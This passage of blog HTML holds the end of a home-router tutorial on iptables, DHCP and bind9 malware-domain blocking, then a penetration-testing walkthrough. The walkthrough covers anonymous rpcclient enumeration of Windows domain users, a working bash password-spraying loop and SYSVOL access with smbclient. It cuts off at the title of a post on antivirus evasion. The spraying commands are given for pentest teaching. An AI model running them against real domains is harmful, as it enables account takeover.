<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In the OUTPUT section, we need to the router to forward all traffic to the Loopback interface, and then we need to define rules for the router itself to transmit to the internal network, and the Internet as follows:</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Transmit DNS traffic to any host on any network.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Allow the router to perform “WHOIS” queries on TCP port 43, and allow for Ubuntu software updates across HTTP/HTTPS. </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Allow the router to perform Network Time Protocol queries.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Allow the router to transmit DHCP INFORM packets on the internal network.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Allow the router to transmit ICMP packets on the internal network.</span></div>
</li>
</ul>
<br /><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="241" src="https://lh4.googleusercontent.com/lEUDbbpgKLK4v7lBBIDtBIaqxtrd0t40s3vItm8V8-S3GM_dkkDCmvIbqohai92QUS_jVxpnniMCrmUWYmFkKTfnunEDkfoNxvgNMHCvkWBhXRZSvXQvJ2M_s59ilYyKN1ZKaiWL" style="-webkit-transform: rotate(0.00rad); border: 1px solid #000000; transform: rotate(0.00rad);" width="529" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Packet output/egress section (from router) of “filter” section</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="107" src="https://lh3.googleusercontent.com/AorzQkaN7tGcqrciCzSmb3QCfJDzvVBvMwEjHTVFPpZGxj4Ggarf58RwGpqJT5hEvgVS43AoPNG7UYzLX_4ZrPs7lElRGRlBZapBQMV_GeiTsAA2-cHSNRihx2BmDeo4SszOIWXW" style="-webkit-transform: rotate(0.00rad); border: 1px solid #000000; transform: rotate(0.00rad);" width="535" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Now we accept state related packet flows, and then drop and log anything else</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The FORWARD section of the IPTABLES rules determines exactly what traffic is able to flow (be forwarded) </span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">across</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> your router. It is important to not confuse this section with the INPUT/OUTPUT portions of the rules. The FORWARD section is where the magic happens to get packets from your internal network to the Internet. In this example, we have a fairly liberal policy which allows all IPv4 TCP, UDP, and ICMP traffic to the Internet and accepts any state related traffic.</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="115" src="https://lh5.googleusercontent.com/lMeKYar16sPM9HEchb3Mj7A1rSet3JBCZg6SMfcUYFlxDfTRvMvjwwuPzmTyOIDv46e_Auy1gdSRJ8NBp1xr5Zah-6b7Y1X9KUfirkcSwwjvaxmIrclOjhLQm_O1JtgXFhsRfEHq" style="-webkit-transform: rotate(0.00rad); border: 1px solid #000000; transform: rotate(0.00rad);" width="546" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Packets that will be forwarded across the router interfaces</span></div>
<br /><br /><br /><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">As a final step in our configuration, we log all dropped packets to the syslog LOCAL7 facility. The idea being that we can configure “rsyslog” with a rule that matches this prefix and writes the logging data to a file.</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="129" src="https://lh5.googleusercontent.com/zM_prIQJZdK4_58O1olrsKr-VS0nvV2uvcHBFyKnkMuB50dfYVkiMBmxhcczrRkxf8eFIadGaswfSG69q82DDYhwuVg65FsMLtMBSWJzEdANG5fceOvERF1NXjiaRx7pW-BkPs-X" style="-webkit-transform: rotate(0.00rad); border: 1px solid #000000; transform: rotate(0.00rad);" width="536" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Finally, we log things by prefixing “iptables:” to the syslog data flow</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">For extra information, here is the “rsyslog” configuration file I use to log the data.</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="68" src="https://lh6.googleusercontent.com/YtoEBd16J4GBYVl5ZXCGd0V_dEqvYJO_5Knrm9tMQuItA0PfZ2Q3KJ6ReoGnil7g85PGnaa3fMCV-O94-vAm9Y399kwKZRxBR9aBOBi7hbtTMJnttY4ypZUyj9vqdP5c0JvL3Ro0" style="-webkit-transform: rotate(0.00rad); border: 1px solid #000000; transform: rotate(0.00rad);" width="490" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/etc/rsyslog.d/30-iptables.conf</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">DHCP, and DNS Services</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Now we have covered the essential core components of forwarding packets, we can talk about DHCP and DNS. Starting with DHCP, what we need to do is provide basic IP address service on our three internal network segments. On each segment, we will start with a lower address at x.x.x.50 so we can reserve a little static address space for other miscellaneous uses. We will also set up lease times for 30 days (30 * 86400 seconds). Addresses will be provided on all three internal network interfaces (eth1, eth2, and eth3). This file is to be saved as “/etc/dhcpd/dhcp.conf”.</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="569" src="https://lh6.googleusercontent.com/McK6Yq6Dz219Tq3Bvl0aPXiX1gKG7ue61LRzud0nU3coqLc-QW_wUvsWuTZX_Nx9BZtuzralH5qKFrleG922UZAkFw73UhymFElNKSAeqBBUZWM4u14bVjfyvST8rMIE5wjiX03q" style="-webkit-transform: rotate(0.00rad); border: 1px solid #000000; transform: rotate(0.00rad);" width="422" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/etc/dhcp/dhcpd.conf</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">With regard to bind9 (DNS services), the default Ubuntu installation will yield a caching name server which utilizes the Internet root caching servers, and is sufficient for most purposes. The extension some people may want to consider is to forward queries to a DNS filtering service (such as OpenDNS), and/or run some specific filtering on your own. In my case, I leverage the “dshield” bad domain lists which as maintained by Johannes Ulrich of the SANS institute. An example of how to configure bind9 to forward all queries to an upstream DNS server is listed below.</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The configuration screenshot below is a modification to the “/etc/bind/named.conf.options” file to forward all queries to the upstream Google DNS server of 8.8.8.8, and to filter the networks able to perform recursive DNS queries. Forwarding to an upstream server is completely optional, and if you choose this, a trusted DNS filtering service is advisable. Filtering on what clients can make recursive queries should be considered as an essential part of the configuration.</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="318" src="https://lh3.googleusercontent.com/hv6TgZmRYbENslTOmuHzPGMnk0KzzHR_SQPAgadyKJASUGNr7lbarPKq9a4RTMC2hs1rJD41NlmdLa6AU9Gw2Kdl1buvU8uvYRJE_UNrSFTdmKGGfkw-CwmlsMD9iEi5qOTcYVms" style="-webkit-transform: rotate(0.00rad); border: 1px solid #000000; transform: rotate(0.00rad);" width="342" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/etc/bind/named.conf.options</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">As regards the “dshield” bad domains list, I have created a shell script called “get_malware_domains.sh” whose job it is to fetch the URL “</span><a href="https://isc.sans.edu/feeds/suspiciousdomains_Low.txt" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://isc.sans.edu/feeds/suspiciousdomains_Low.txt</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">” and then convert that list into bind9 configuration file format. An example of the configuration file format is as follows.</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="140" src="https://lh3.googleusercontent.com/pi10v96Ts6r9Wb_EE8346G7REOISl5ODseUbBgB0ThmdrNdaz83bpHm28MEePnevF039Lyos8U1D8AuDtO82x6qf6Lyq3fY1StBzgnhGbaSd1gWoFJIylGTL8GYOLEOdTL-X4Edf" style="-webkit-transform: rotate(0.00rad); border: 1px solid #000000; transform: rotate(0.00rad);" width="511" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">named.conf.dshield file</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The concept is that any domain listed in this file will be resolved to the address “127.0.0.1”.</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="148" src="https://lh6.googleusercontent.com/Ce2dYlkaiyk9P3ZjAxN1DnxP_rIeBkonQWYJhyDi--a0YC8ftrLqmCUHrtg3D0d2l4uzQnDx-qu9YSz8kFP0Rbm7twJkMrBSN8KuoJ8sS0mbSrx9j8-tX0pDk_LG13Q8DqrTFdWP" style="-webkit-transform: rotate(0.00rad); border: 1px solid #000000; transform: rotate(0.00rad);" width="433" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The “db.blackhole” file contents.</span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">All of the above descriptive text will also be supported by a small tar file containing some of the key file contents described here. Happy hunting!</span></div>
</b><br class="Apple-interchange-newline" /> </b>Unknownnoreply@blogger.com4tag:blogger.com,1999:blog-2320276621879394553.post-73037981360992125632015-10-29T17:59:00.000-07:002015-10-30T06:30:57.718-07:00Password spraying and other fun with rpcclient<br />
<span style="font-family: Arial,Helvetica,sans-serif;">Many of us in the penetration testing community are used to scenarios whereby we land a targeted phishing campaign within a Windows enterprise environment and have that wonderful access into the world of Windows command line networking tools. You get your shell and before you know it, you are ready to run all your favorite enumeration commands. These are things like:</span><br />
<ul>
<li>C:\> NET VIEW /DOMAIN</li>
<li>C:\> NET GROUP "Domain Administrators" /DOMAIN</li>
</ul>
<span style="font-family: Arial,Helvetica,sans-serif;">and so on. Not to mention that you often have all of the wealth of Metasploit post exploitation modules, and the many wonders of various PowerShell tools such as Veil, and PowerShell Empire.</span><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">Imagine a world where all you have is a Linux host available on an internal network with no backdoor shell access to any existing Windows system. Imagine that world wherein you are effectively segmented away from the rest of the network and cannot even capture useful network traffic using interception techniques such as Ettercap. This was indeed the case for me recently whereby all I could do was SSH into a single Linux host I controlled.</span><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">After having not been in this situation in some time, I paused a moment before recalling the wonderful world of Samba. In particular there are two excellent, and useful programs in the Samba suite namely "<b>rpcclient</b>", and its friend "<b>smbclient</b>". Also, let us not forget our favorite DNS utility called "<b>dig</b>".</span><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">My first task was to use available reconnaissance to make informed guesses as to what the internal domain name was likely to be. There are a few different methods to think about here but the first thing was to play with "dig" to determine DNS information of use. I can try to look up the Windows global catalog record, and authoritative domain server records to determine domain controller addresses. Examples as follows:</span><br />
<br />
<b><span style="color: #38761d;"><span style="font-family: "Courier New",Courier,monospace;"># dig @10.10.10.10 -t NS domain.corp</span></span></b><br />
<b><span style="color: #38761d;"><span style="font-family: "Courier New",Courier,monospace;"># dig @10.10.10.10 _gc.domain.corp</span></span></b><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">This will only give me answers if I have predicted or determined the correct "domain.corp" name.</span><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">Now, luckily for me I had access to internal Nessus vulnerability report data and had determined that SMB NULL sessions were permitted to some hosts. I matched up the data to my dig results and determined that the NULL sessions were actually corresponding to domain controller addresses. My next task was to try and enumerate user and group information from the domain controllers with "rpcclient" only available to me. I quickly determined by using the "man" page that rpcclient could indeed perform an anonymous bind as follows:</span><br />
<br />
<b><span style="color: #38761d;"><span style="font-family: "Courier New",Courier,monospace;"># rpcclient -U "" -N 10.10.10.10</span></span></b><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;">whereby 10.10.10.10 was the chosen address of the domain controller I could anonymously bind to. After that command was run, "rpcclient" will give you the most excellent "rpcclient> " prompt. At this point in time, if you can use anonymous sessions, then there are some very useful commands within the tool.</span><br />
<ol>
<li><span style="font-family: Arial,Helvetica,sans-serif;">Enumerate Domain Users</span><br /><br /><span style="font-family: "Courier New",Courier,monospace;"><b><span style="color: #38761d;">rpcclient $> enumdomusers<br />user:[Administrator] rid:[0x1f4]<br />user:[Guest] rid:[0x1f5]<br />user:[krbtgt] rid:[0x1f6]<br />user:[jdoe] rid:[0x44f]<br /></span></b></span></li>
<li><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Arial,Helvetica,sans-serif;">Enumerate Domain Groups<br /><br /><span style="font-family: "Courier New",Courier,monospace;"><span style="color: #38761d;"><b>rpcclient $> enumdomgroups<br />group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]<br />group:[Domain Admins] rid:[0x200]<br />group:[Domain Users] rid:[0x201]<br />group:[Domain Guests] rid:[0x202]<br />group:[Domain Computers] rid:[0x203]<br />group:[Domain Controllers] rid:[0x204]<br /></b></span></span></span></span></li>
<li><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Arial,Helvetica,sans-serif;">Query Group Information and Group Membership<br /> </span></span><br /><b><span style="color: #38761d;">rpcclient $> querygroup 0x204<br /> Group Name: Domain Controllers<br /> Description: All domain controllers in the domain<br /> Group Attribute:7<br /> Num Members:1<br /><br />rpcclient $> querygroupmem 0x204<br /> rid:[0x3e8] attr:[0x7]<br /></span></b></span></span></span></li>
<ol>
<li><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Arial,Helvetica,sans-serif;">Query Specific User Information (including computers) by RID.</span><br /><br /><b><span style="font-size: x-small;"><span style="color: #38761d;">rpcclient $> queryuser 0x3e8<br /> User Name : WIN-LV721N9S64M$<br /> Full Name : <br /> Home Drive : <br /> Dir Drive : <br /> Profile Path: <br /> Logon Script: <br /> Description : <br /> Workstations: <br /> Comment : <br /> Remote Dial :<br /> Logon Time : Thu, 29 Oct 2015 19:21:28 EDT<br /> Logoff Time : Wed, 31 Dec 1969 19:00:00 EST<br /> Kickoff Time : Wed, 13 Sep 30828 22:48:05 EDT<br /> Password last set Time : Mon, 12 Oct 2015 00:12:11 EDT<br /> Password can change Time : Tue, 13 Oct 2015 00:12:11 EDT<br /> Password must change Time: Wed, 13 Sep 30828 22:48:05 EDT<br /> unknown_2[0..31]...<br /> user_rid : 0x3e8<br /> group_rid: 0x204<br /> acb_info : 0x00002100<br /> fields_present: 0x00ffffff<br /> logon_divs: 168<br /> bad_password_count: 0x00000000<br /> logon_count: 0x00000834<br /> padding1[0..7]...<br /> logon_hrs[0..21]...</span></span></b></span></span></span><span style="font-family: Arial,Helvetica,sans-serif;"><br /><br /><br />So in working with these basic commands, I was able to survey the landscape of Windows domain user, and group information pretty thoroughly.<br /><br />Another technique often used during a penetration test is called "Password Spraying". This is a particularly effective technique whereby given a list of domain users, and knowledge of very common password use, the tester attempts to perform a login for every user in the list. The technique is very effective given that you deliberately limit the list of passwords to try to a small number. In fact a single password per spraying attempt is advisable for the sole reason that you really do not want to lock accounts.<br /><br />Before password spraying, it is very useful to determine the Windows domain password policy using a command such as "NET ACCOUNTS /DOMAIN" in the Windows world. However given that we don't have a Windows shell available to us, rpcclient gives us the following options.<br /><br /><span style="font-family: "Courier New",Courier,monospace;"><b><span style="color: #38761d;">rpcclient $> getdompwinfo<br />min_password_length: 11<br />password_properties: 0x00000000<br /><br />rpcclient $> getusrdompwinfo 0x44f<br />min_password_length: 11<br /> &info.password_properties: 0x4b58bb34 (1264106292)<br /> 0: DOMAIN_PASSWORD_COMPLEX <br /> 0: DOMAIN_PASSWORD_NO_ANON_CHANGE<br /> 1: DOMAIN_PASSWORD_NO_CLEAR_CHANGE<br /> 0: DOMAIN_PASSWORD_LOCKOUT_ADMINS<br /> 1: DOMAIN_PASSWORD_STORE_CLEARTEXT<br /> 1: DOMAIN_REFUSE_PASSWORD_CHANGE</span></b><br /><br /><span style="font-family: Arial,Helvetica,sans-serif;">At least we are able to determine the crucial information about the password length. After I write this, I will probably work out how to decode the password properties and match them back to the appropriate information but I have not yet done that task.<br /><br />In order to perform a password spray attack, the next step is to pick a common password (such as "Autumn2015") and work out our technique on how to spray using "rpcclient". Conveniently, "rpcclient" allows us to specify some commands on the command line which is very handy. The follow two examples show a successful logon versus a failed logon. (password of "bbb" is the correct logon)<br /><br /><b><span style="color: #38761d;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;"><span style="font-size: small;"># rpcclient -U "jdoe%bbb" -c "getusername;quit" 10.10.10.10</span></span>Account Name: jdoe, Authority Name: DOMAIN<br /><br /># rpcclient -U "jdoe%aaa" -c "getusername;quit" 10.10.10.10<br />Cannot connect to server. Error was NT_STATUS_LOGON_FAILUR<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-family: "Courier New",Courier,monospace;">E</span></span></span></span></b><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Arial, Helvetica, sans-serif;"> </span></span></span></span></span><br /><span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /><br />In these examples, we specifically told "rpcclient" to run two commands, these being "getusername" and then "quit" to exit out of the client. Now we have all of the ingredients to perform a password spraying attack. All we need is a bourne/bash shell loop and we are off to the races. Example of a simple shell script or command line to spray given that the "enumdomusers" output is in the "domain-users.txt" file would be as follows.<br /><br /><br /><b><span style="color: #38761d;"><span style="font-family: "Courier New", Courier, monospace;"># for u in `cat domain-users.txt`; do \<br /> echo -n "[*] user: $u" && \<br /> rpcclient -U "$u%Autumn2015" \<br /> -c "getusername;quit" 10.10.10.10</span></span></b></span></span><b><span style="color: #38761d;"><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Arial, Helvetica, sans-serif;"> </span></span><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Arial, Helvetica, sans-serif;">\</span></span><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Arial, Helvetica, sans-serif;"> </span></span><span style="font-family: "Courier New",Courier,monospace;"> <br />done</span></span><span style="font-family: "Courier New",Courier,monospace;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></b><br /><br />You know that you are successful when you see the string "Authority" appear in the output. Lack of success for each user is going to be the "NT_STATUS_LOGON_FAILURE" message.<br /><br />If you begin to get the "ACCOUNT_LOCKED" failure you should immediately stop your spray because you have likely sprayed too many times in a short period of time. <br /><br />Assuming you have gained access to a credential, one of the additional nice things you can do is explore the SYSVOL using the "smbclient" program. The syntax is as follows.<br /><br /><span style="font-size: x-small;"><span style="color: #38761d;"><b><span style="font-family: "Courier New",Courier,monospace;">$ smbclient -U "jdoe%bbb" \\\\domain.corp\\SYSVOL<br />Domain=[HOME] OS=[Windows Server 2008 R2 Standard 7601 Service Pack 1] Server=[Windows Server 2008 R2 Standard 6.1]<br />smb: \> ls<br /> . D 0 Fri Dec 12 09:46:28 2014<br /> .. D 0 Fri Dec 12 09:46:28 2014<br /> domain.corp D 0 Fri Dec 12 09:46:28 2014<br /><br /> 61337 blocks of size 1048576. 38567 blocks available</span></b></span><br /><br /><span style="font-size: small;">I highly recommend getting familiar with the UNIX Samba suite and in particular these tools. They quite literally saved by bacon over the past week and you could well be in the same boat needing these fun tools in your future also.</span><br /> </span></span> </span></span></li>
</ol>
</ol>
<br />
<br />
<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;"><br /></span>
<span style="font-family: "Courier New",Courier,monospace;"><br /></span>
<span style="font-family: "Courier New",Courier,monospace;"><br /></span>
<br />
<br />
<br />
<br />
<br />
<br />Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2320276621879394553.post-49204527756758437412015-10-29T07:57:00.004-07:002015-10-29T07:57:38.288-07:00Modifying Metasploit x64 template for AV evasion<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
